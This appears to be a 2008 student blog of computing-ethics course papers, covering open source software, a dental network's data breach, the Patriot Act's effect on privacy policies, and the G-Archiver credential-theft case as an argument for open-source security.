Showing posts with label ethics. Show all posts
Showing posts with label ethics. Show all posts

Monday, April 14, 2008

Social Implications of Open Source Software

Here's the prompt for this week's paper:

“Positive or Negative social implications of open source or 'free software'.”

What is open source or 'free' software? In this analysis I'm only going to refer to open source software, or what is commonly referred to as “Free as in 'Free Speech'”. This means you have access to the source code, and are free to modify it however you wish, and even redistribute it. The other definition is often stated as “Free as in 'Free Beer'”, meaning it costs nothing. These often go hand in hand since when you have the source code and may redistribute it, nothing stops you from giving it away for free. I'm not going to discuss the economics of open source software, as I feel that it is a discussion well suited for a different place.

What are the implications of open source software? You have the ability to look into exactly what a program does and learn from it or improve it. People also tend to argue that software that is not open source is unethical. Although I am a huge supporter of open source software, I have to argue that they are wrong. An article titled The Social Implications of Free Software on FSM states:

“Above all, Free Software is an ethical choice—not one of convenience. NGOs also tend to receive, store and disseminate huge amounts of information. It helps to be able to access info (in digital format) without having to 1) break the law, and 2) spend money to purchase applications to “read” the information. Using free software enables that, as South India-based lawyer Mahesh Pai points out.”

The argument made here is a non-sequitur; the arguments for open source software is that it is free and legal, which in no way implies that proprietary software is unethical. There should be a distinction between ethical implications and economic factors. It is not unethical to charge people for a product. The point made here is that a social implication of open source software is that is it much more likely to be used in a economically challenged locale, due to the low cost of the software (which is often gratis).

There are many benefits to using open source software. Nearly all proprietary software now has an open source counterpart, and in my opinion, many of them are much better than their proprietary counterparts. (There are also some that are much worse too.) Open Source software is often much more secure than proprietary software, which is interesting due to the full source code being available for anyone who would want to see it. I have written about this topic before, if you want to read more about this, go read my previous post Security through Open Source.

Open source software is created by a community of developers who share a generally common set of beliefs. This has lead to it's own community of OSS developers and users. This community continues to grow and thrive today. The community has a great property which will lead to it's success, and that is that the more developers that work on OSS, and the more users who commit to the community, the stronger it grows. This is fostered by the idea that all the software should be available from source code, and that anyone is free to modify and redistribute it. As more people work on it, bugs will be fixed, features will be added, and the software becomes more useful to more people.

Monday, March 31, 2008

Another data breach goes nearly unnoticed.

Vague topic this week, I'm under the assumption that I can basically choose anything involving ethics in computer science for this article. Link to the original assignment.

A recent incident of personal data being unintentionally released has occurred affecting 75,000 members of the public website for The Dental Network. The information contained full names, complete addresses, dates of birth, and social security numbers. This was reported by The Baltimore Sun on March 26th, 2008, even though the security breach happened February 20th, and the affected persons were informed by letter on March 10th, nearly three weeks later. Thousands of dollars in unauthorized purchases, accounts being opened and held for use at a later date, and many other illegal activities all could have happened before anyone was informed that they were at risk.

According to the Baltimore Sun: article,

“The company says that to its knowledge, no one has misused the information.”
The company has offered those who were affected 12 months of free credit monitoring, and sent information to these people on how to contact the credit bureau's and put a fraud alert on their account.
"We moved in a timely fashion to secure the data and notify the members,"
said CareFirst spokesman Michael Sullivan, but the article also mentions that
“[The information] had been posted on its Web site for two weeks in February because of a technical error.”

The Consumerist also picked up this article and added a few interesting points. They are critical of the companies offer of free credit monitoring services for a year, saying it's too short.
“Companies, is it really that expensive to offer 5 years, or 10 years, of credit monitoring to victims of your data security incompetence? Seriously, own up to your responsibility in exposing people to the risk of financial and credit problems and give them the tools they need to protect themselves. After all, it's your fault.”

This is a valid point. The company is at fault here, and the threat of identity theft due to this will not be gone in one year.

While on the website of The Dental Network, I could find no mention of the data breach, even though it is now only 3 weeks after the affected users were informed, and only 3 days after the article was picked up by The Baltimore Sun. The home page of the site is now displaying the message that:
“New Sales of Dental HMO Products Temporarily Halted in Maryland, Due to a technical issue involving the internal restructuring of The Dental Network (TDN).”

The company seems to be taking no responsibility for what has happened, instead trying to hide it away from people to attempt to maintain a semblance of security. Take a look and judge it for yourself, the website looks like it was created 10 years ago, and their policy for data integrity probably hasn't been updated since then.

It is the responsibility of The Dental Network to inform the people affected in this case. There is a state law passed in Maryland that requires businesses to respond promptly in the case of a data breach. It is my opinion that this company did not adhere to this law. The users in this case should have been given the positive right to privacy by the company, but instead it was broken, and the data was leaked. This clearly violates the ACM Code of Ethics, specifically section 1.7:
“Respect the privacy of others.”
The Dental Network should have been more diligent in securing the personal data of it's users, and much faster at noticing the breach and notifying it's users. There was a total of two weeks before the breach was noticed, and 3 more weeks before users were notified. That's 5 weeks were a potential criminal could have had access to this data. Five weeks is completely unacceptable.

UPDATE: I found the FAQ for the data breach. The data there isn't very helpful, and would likely only confuse and cause most people to ignore it. All of the information contained is about what you should do, the company seems to be doing nothing on it's own, therefore leaving the majority of people affected without any security against identity theft.

Thursday, March 27, 2008

U.S. Patriot Act causes ethical concerns for software developers

Here's the topic from the third paper:

“Pick an example from Chapter 2 or 5 and show if the people who built the software acted ethically according to Appendix A and your general sense of ethics.”


It occurs to me that I haven't noted which textbook we are using. It is A Gift of Fire, by Sara Baase, Third Edition.

Here's my paper, I tried not to include too much reference to the book, but it was needed for this assignment.

A good example of software that has been built upon questionable ethics is the software and procedures that the government uses to obtain personal information about suspected criminals.[1] “The U.S. Patriot Act, passed in the weeks after the September, 2001, terrorist attacks in the United States, gives authorities the means to secretly view personal data held by U.S. Organizations” from the article Patriot Act haunts Google service on www.theglobeandmail.com. This law conflicts with many other government's privacy laws, which require organizations to protect all private information, and also require that the consumer is informed when this information is obtained, regardless of the process, by a third party. According to the Software Engineering Code of Ethics and Professional Practice (Version 5.2) section 1.04 Software engineers shall, as appropriate “Disclose to appropriate persons or authorities any actual or potential danger to the user, the public, or the environment, that they reasonably believe to be associated with software or related documents.” It is my argument that the U.S. Patriot Act causes the potential threat of private data being obtained by an outside party, in this case, the U.S. government, and that this causes an ethical dilemma for software developers, specifically in the U.S.

Some people have recently noted effects of the law. In the recent article posted on www.theglobeandmail.com, and also covered on boingboing.net, there is a discussion of how the U.S. Patriot Act affects the use of Gmail, specifically in countries outside of the U.S. The information obtained by Google when a user uses Gmail can legally be reviewed by the U.S. government under loose controls. Not only is the ethicalness of the U.S. Patriot Act in the regards to privacy put into question, but it also causes an ethical dilemma for software developers. If the government can obtain personal information about someone without a warrant, is it ethical for a software company to keep data about you without informing you of the potential breach of privacy? A well defined privacy policy such as Google's are likely to provide a clause for this situation, such as “We may also share information with third parties in limited circumstances, including when complying with legal process, preventing fraud or imminent harm, and ensuring the security of our network and services.” It is my opinion that privacy policies are created to protect the organization, instead of to protect the end user.

Many people would argue that the privacy policy is a solution to the ethical issues prevented here, but I do not think that it provides a full solution. The majority of users will never read a privacy policy, and of those that do, many of them will not understand the complete implications of it. It's likely the privacy policy misses some small detail that is important to the user, or some situation that the writer completely overlooked. It would be nearly impossible for the writer to know the complete set of laws that govern their organization, especially with the recent globalization of Internet based companies. How far do you have to go in informing the end user of possible dangers of using the service for you to have done what can be considered ethical?

Unfortunately, I don't have a solution to this problem. Ethical guidelines dictate that you should inform the end user of all potential danger to them, and breaches of privacy clearly fall in this category. However, “because no matter what promises companies make (or what privacy laws Congress might enact), data leaks happen.”, so maybe that should be taken into account when writing up a privacy policy. If there is a distinct possibility of a third party obtaining a user's personal data without the permission of that user, the software developer should make this information apparent to all of it's users. It doesn't matter if the third party is a government, or someone malicious looking to steal your identity, it still constitutes a breach of privacy, and the user needs to be informed.

Monday, March 24, 2008

Security through Open Source

Topic for paper number two:

Write a “Short paper on a computing technology of your choosing introduced in the last 30 years that you believe has been used unethically. Include references and cite from the Codes of Ethics in Appendix A.”



There have been many new computing tools introduced in the last 30 years, some even earlier, that have been used unethically. Usually these tools have legitimate and legal reasons for being created, but often these tools can also be used for questionable or unethical behavior. The UNIX security scanner Nmap has many legitimate uses, and comes installed on almost all Linux systems. However, even a program this widespread can be used for black-hat purposes.

A more recent example (Nmap was created in 1997), came up in an article on Coding Horror entitled A Question of Programming Ethics. A program called G-Archiver was found to contain code that used a hard coded email and password to send an email containing every username and password that entered into the software back to the creator of the program. This was a huge breach of trust between the author of the program and it's users. Luckily, a good hearted programmer had looked into the source code and found this, and instead of abusing what he found, he deleted all of the emails in the account, changed the password, and sent a message to Google asking them to delete the account.

There is no way to know exactly how many people could have found this before the security flaw was exposed, and instead of doing what this person did, stayed quiet and used the stolen information for their own purposes. Since the source code was easily examined, this flaw was found, but imagine how long this could have occurred if the source was not accessible. This brings up the topic of security through openness.

By completely exposing what your program does, the end user has a way to ensure your program only does what you say it does. However, this also allows the end user to more easily find vulnerabilities in the software. Having an open source program forces the programmer to understand these risks, which also helps to avoid poor decisions such as using security through obscurity. This could be interpreted to apply directly to Principle 1.04 of The Software Engineering Code of Ethics: “Disclose to appropriate persons or authorities any actual or potential danger to the user, the public, or the environment, that they reasonably believe to be associated with software or related documents.” How can you disclose any more information about your software than releasing the full source code?

There will always be tools created for completely legitimate purposes that will be converted into tools for unethical uses. Something as simple as a match can be used for many ethical uses, but it could also be used to burn down a house. The only thing that you as a programmer can do, is make sure that you make ethical decisions; you don't get a choice of what your users will do.